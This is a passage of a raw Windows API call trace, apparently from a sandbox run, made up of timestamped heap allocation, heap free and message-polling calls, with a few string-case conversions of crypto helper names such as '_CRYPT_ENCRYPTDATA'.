RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0041.518] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.518] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.518] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc15) returned 0x7c9968 [0041.519] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.519] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c9968 | out: hHeap=0x770000) returned 1 [0041.519] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.519] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0041.519] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0041.519] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.519] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.519] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0041.519] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.519] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0041.519] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0041.519] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.519] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.519] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0041.519] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.519] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0041.519] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0041.519] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.519] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0041.519] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.519] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.519] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0041.519] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0041.519] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0041.519] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0041.519] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.519] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0041.519] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc15) returned 0x7c9968 [0041.519] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.519] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1b8 [0041.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0041.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0041.520] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0041.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da348 [0041.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0041.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0041.520] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0041.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da378 [0041.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0041.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0041.520] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0041.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cce8 [0041.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0041.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0041.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0041.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0041.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0041.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc15) returned 0xac2c38 [0041.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0041.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0041.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0041.520] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0041.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0041.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0041.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0041.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0041.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0041.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0041.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0041.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0041.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0041.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0041.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0041.521] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0041.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0041.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0041.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0041.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0041.521] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0041.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0041.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0041.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0041.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0041.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0041.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0041.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0041.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0041.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0041.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0041.521] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0041.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0041.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0041.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da328 [0041.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0041.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0041.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0041.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0041.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb20 [0041.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0041.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0041.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0041.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0041.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0041.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0041.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0041.522] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0041.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0041.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0041.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0041.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0041.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0041.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0041.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0041.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0041.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0041.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0041.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0041.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0041.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0041.522] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0041.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0041.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0041.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0041.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0041.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0041.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0041.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0041.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0041.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0041.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0041.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0041.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0041.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0041.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0041.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0041.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0041.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0041.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0041.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0041.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0041.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0041.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0041.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.523] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0041.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0041.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0041.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0041.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0041.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0041.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0041.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0041.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0041.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.524] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0041.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0041.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0041.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0041.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0041.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0041.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0041.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0041.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0041.524] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.524] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0041.524] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.524] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0041.524] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0041.524] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0041.524] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0041.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0041.524] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0041.524] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0041.524] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.524] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0041.524] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.524] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0041.524] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb50 [0041.524] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0041.525] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0041.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0041.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0041.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0041.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0041.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0041.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0041.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0041.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0041.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0041.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0041.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0041.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0041.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0041.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0041.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0041.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0041.526] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.526] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0041.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.526] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0041.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0041.526] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0041.526] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.526] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0041.526] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0041.526] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0041.526] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0041.526] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0041.526] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0041.526] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0041.526] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0041.526] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0041.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0041.526] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0041.526] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0041.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0041.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0041.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0041.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0041.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0041.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0041.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0041.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0041.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0041.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.526] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0041.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0041.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0041.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 